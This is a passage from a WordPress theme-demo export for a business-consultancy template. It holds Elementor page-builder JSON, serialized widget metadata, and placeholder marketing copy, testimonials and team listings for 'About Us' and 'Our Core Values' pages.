company<\/p>","text_color":"#878787","typography_typography":"custom","typography_font_family":"Raleway","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"500","typography_text_transform":"uppercase"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6af12be","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"112","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"9865002","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"0c75221","elType":"widget","settings":{"title":"Trusted <br>Clients","number":"350","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"4efe597","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"3976936","elType":"widget","settings":{"title":"Finished <br>Projects","number":"215","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"7d86b75","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"75279d9","elType":"widget","settings":{"title":"Years of <br>Experience","number":"15","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"7c9f8c9","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"5e295b7","elType":"widget","settings":{"title":"Visited<br>Conferences","number":"36","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false}],"isInner":false},{"id":"07bb3a8","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-about-us.jpg","id":504},"background_position":"top center","background_repeat":"no-repeat","padding":{"unit":"px","top":"115","right":"0","bottom":"66","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"9fed965","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d2ab48f","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"44","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"ad3790a","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"ca838f8","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"ba65ecc","elType":"widget","settings":{"sub":"what we do","title":"Creating Your Startup Business","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"260733b","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center","text_color":"#FFFFFF"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"bdb7238","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"658246c","elType":"widget","settings":{"image_boxes":[{"_id":"e6758bb","image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features1-about-us.jpg","id":501},"title_box":"Accounting & Finance","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features2-about-us.jpg","id":502},"title_box":"Management Skills","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"112b6ab"},{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features3-about-us.jpg","id":503},"title_box":"Business Planning","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"8732ef5"}],"label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[],"widgetType":"iiboxcarousel"}],"isInner":false}],"isInner":false},{"id":"edf75b3","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"dda17b7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"1b3917e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-about-us.png","id":508},"image_size":"full"},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"3490ca0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"8df0dd7","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","_margin":{"unit":"px","top":"-70","right":"0","bottom":"0","left":"0","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"9bcd87a","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a428896","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"17","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"},{"id":"2c76de7","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"17","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"},{"id":"2e8f3f7","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false}],"isInner":false},{"id":"b43fd21","elType":"section","settings":{"background_background":"classic","background_color":"#FF8523","padding":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"4493cd0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"12e7c1c","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":510},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":511},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":512},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":513},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":514},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":515},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]}},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false},{"id":"0308eae","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-about-us.jpg","id":520},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"175","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"140","left":"0","isLinked":false}},"elements":[{"id":"12b16f2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"61fb36b","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e5ca1cb","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"4431150","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"e15f0b3","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"dc4d425","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"bec6367","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"324dce4","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/wp-content\/themes\/maxbizz\/images\/avatar-1.png"},"tname":"Oliver Simson","tjob":"client of company","_id":"560686e"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"18ebffe"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"25d98b7"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/wp-content\/themes\/maxbizz\/images\/avatar-1.png"},"tname":"Oliver Simson","tjob":"client of company","_id":"1180cad"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"0f71845"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"2d0cde6"}],"tshow":"3","loop":"true","tcontent_bg":"#FFFFFF"},"elements":[],"widgetType":"itestimonials"}],"isInner":false}],"isInner":false},{"id":"e76f400","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"beac444","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"eab9ff6","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7fb7005","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"b8f3d6d","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"532ec06","elType":"widget","settings":{"sub":"our team","title":"Our Skilled Leaders","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"f9af862","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"0e38994","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"9a95313","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"0b610b3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2828095","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team1.jpg","id":524},"member_name":"Monica Black","member_extra":"chief communication officer","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"c25c0ad","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f09ab14","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team2.jpg","id":525},"member_name":"Peter Perish","member_extra":"chief business project","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"ec58039","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"e65282d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team3.jpg","id":526},"member_name":"Olivia Woodson","member_extra":"international consultant","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"13da770","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f627004","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team4.jpg","id":527},"member_name":"Peter Adams","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}]},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true},{"id":"35690a4","elType":"widget","settings":{"align":"center","text":"Explore More ","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-team","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:13:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:2;s:12:"align_tablet";i:1;s:12:"align_mobile";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:12:"width_tablet";i:1;}}s:8:"advanced";a:2:{s:14:"_section_style";a:5:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}s:15:"_section_border";a:2:{s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:27;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:27;s:19:"_inline_size_tablet";i:21;s:19:"_inline_size_mobile";i:4;}}s:5:"style";a:1:{s:14:"section_border";a:4:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:19:"border_width_mobile";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:6:"margin";i:2;s:13:"margin_mobile";i:1;s:13:"margin_tablet";i:2;}}}}s:8:"iheading";a:3:{s:5:"count";i:5;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:5;s:5:"title";i:5;s:11:"header_size";i:5;s:5:"align";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:5;s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:2:{s:14:"subtitle_style";i:5;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:7:{s:10:"text_color";i:2;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:25:"typography_text_transform";i:1;s:5:"align";i:3;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:12;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:6;s:16:"content_position";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:8;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:10;s:14:"padding_mobile";i:6;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:2;s:19:"background_position";i:3;s:17:"background_repeat";i:3;s:16:"background_color";i:1;s:15:"background_size";i:2;}}}}s:8:"icounter";a:3:{s:5:"count";i:4;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:4;s:6:"number";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}s:5:"style";a:1:{s:21:"style_content_section";a:5:{s:28:"number_typography_typography";i:4;s:34:"number_typography_font_size_mobile";i:4;s:18:"title_space_mobile";i:4;s:27:"title_typography_typography";i:4;s:33:"title_typography_font_size_mobile";i:4;}}}}s:13:"iiboxcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:11:"image_boxes";i:1;}}s:5:"style";a:1:{s:21:"style_content_section";a:1:{s:6:"box_bg";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:1:{s:11:"img_spacing";i:1;}}}}s:13:"itestimonials";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:3:{s:12:"testi_slider";i:1;s:5:"tshow";i:1;s:4:"loop";i:1;}}s:5:"style";a:1:{s:13:"style_general";a:1:{s:11:"tcontent_bg";i:1;}}}}s:7:"imember";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:12:"member_image";i:4;s:11:"member_name";i:3;s:12:"member_extra";i:3;s:12:"social_share";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:5:"align";i:1;s:4:"text";i:1;s:4:"link";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Core Values</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-core-values/</link>
		<pubDate>Tue, 08 Sep 2020 04:49:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=529</guid>
		<description></description>
		<content:encoded><![CDATA[what we offer	        <h3>Make Digital Marketing  Work For Your Business</h3>	    
		<p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach. Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them.</p>		
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						01						<h4>Client Learning Programs</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						02						<h4>Partnership Ecosystem</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box2-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						03						<h4>New Business Innovation</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box3-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
	        the language of business	        <h3>Consultancy That Empowers You</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<a href="#our-philo">our philosophy</a>
				<a href="#our-mission">our mission</a>
				<a href="#our-vision">our vision</a>
										<img width="750" height="656" src="https://maxbizz.s3.amazonaws.com/images/image1-value.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-value.jpg 750w, https://maxbizz.s3.amazonaws.com/images/image1-value-300x262.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Philosophy</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
										<img width="750" height="656" src="https://maxbizz.s3.amazonaws.com/images/our-vision.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/our-vision.jpg 750w, https://maxbizz.s3.amazonaws.com/images/our-vision-300x262.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Mission</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
